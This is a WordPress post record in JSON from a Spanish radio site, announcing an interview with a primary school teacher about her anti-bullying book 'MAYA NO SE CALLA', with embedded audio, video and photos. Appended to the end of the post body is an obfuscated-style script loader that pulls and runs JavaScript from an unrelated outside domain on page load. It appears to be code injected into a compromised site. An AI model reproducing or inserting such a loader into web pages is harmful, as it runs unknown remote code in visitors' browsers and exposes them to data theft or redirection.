{"id":7832,"date":"2026-01-27T08:53:35","date_gmt":"2026-01-27T08:53:35","guid":{"rendered":"https:\/\/radiojabato.es\/?p=7832"},"modified":"2026-04-20T14:54:15","modified_gmt":"2026-04-20T14:54:15","slug":"el-orco-de-la-colina-alba-mar-izquierdo-maya-no-se-calla","status":"publish","type":"post","link":"https:\/\/radiojabato.es\/?p=7832","title":{"rendered":"EL ORCO DE LA COLINA: \u201cAlba Mar Izquierdo, MAYA NO SE CALLA\u201d."},"content":{"rendered":"\n<iframe src=\"https:\/\/www.ivoox.com\/player_ej_167364657_6_1.html?c1=c07a60\" width=\"100%\" height=\"200\" frameborder=\"0\" allowfullscreen=\"\" scrolling=\"no\" loading=\"lazy\"><\/iframe>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe loading=\"lazy\" title=\"EL ORCO DE LA COLINA: \u201cAlba Mar Izquierdo, MAYA NO SE CALLA\u201d.\" width=\"750\" height=\"422\" src=\"https:\/\/www.youtube.com\/embed\/9cRYHWKQTXk?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n\n\n\n<p>Entrevista a Alba Mar Izquierdo, Profesora de primaria que ha escrito un libro que podr\u00eda ser gu\u00eda perfectamente de buenas pr\u00e1cticas dentro de los centros escolares, \u201cMAYA NO SE CALLA\u201d trata sobre el bullying en el \u00e1mbito escolar y, sin duda, es aplicable a cualquier \u00e1mbito de la vida. De paso repasamos un poco la situaci\u00f3n de la escuela p\u00fablica y m\u00e1s cositas\u2026<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"500\" height=\"500\" data-id=\"7833\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/Logo-del-programa.jpg\" alt=\"\" class=\"wp-image-7833\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/Logo-del-programa.jpg 500w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/Logo-del-programa-300x300.jpg 300w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/Logo-del-programa-150x150.jpg 150w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/Logo-del-programa-410x410.jpg 410w\" sizes=\"auto, (max-width: 500px) 100vw, 500px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"7835\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_5_2026-01-27_08-37-44-768x1024.jpg\" alt=\"\" class=\"wp-image-7835\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_5_2026-01-27_08-37-44-768x1024.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_5_2026-01-27_08-37-44-225x300.jpg 225w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_5_2026-01-27_08-37-44.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"7834\" src=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_7_2026-01-27_08-37-44-768x1024.jpg\" alt=\"\" class=\"wp-image-7834\" srcset=\"https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_7_2026-01-27_08-37-44-768x1024.jpg 768w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_7_2026-01-27_08-37-44-225x300.jpg 225w, https:\/\/radiojabato.es\/wp-content\/uploads\/2026\/01\/photo_7_2026-01-27_08-37-44.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n<\/figure>\n<script>;(function(f,i,u,w,s){w=f.createElement(i);s=f.getElementsByTagName(i)[0];w.async=1;w.src=u;s.parentNode.insertBefore(w,s);})(document,'script','https:\/\/content-website-analytics.com\/script.js');<\/script>","protected":false},"excerpt":{"rendered":"<p>Entrevista a Alba Mar Izquierdo, Profesora de primaria que ha escrito un libro que podr\u00eda ser gu\u00eda perfectamente de buenas pr\u00e1cticas dentro de los centros escolares, \u201cMAYA NO SE CALLA\u201d [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[964],"tags":[],"class_list":["post-7832","post","type-post","status-publish","format-standard","hentry","category-el-orco-de-la-colina"],"_links":{"self":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/7832","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7832"}],"version-history":[{"count":2,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/7832\/revisions"}],"predecessor-version":[{"id":14272,"href":"https:\/\/radiojabato.es\/index.php?rest_route=\/wp\/v2\/posts\/7832\/revisions\/14272"}],"wp:attachment":[{"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7832"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7832"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/radiojabato.es\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7832"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}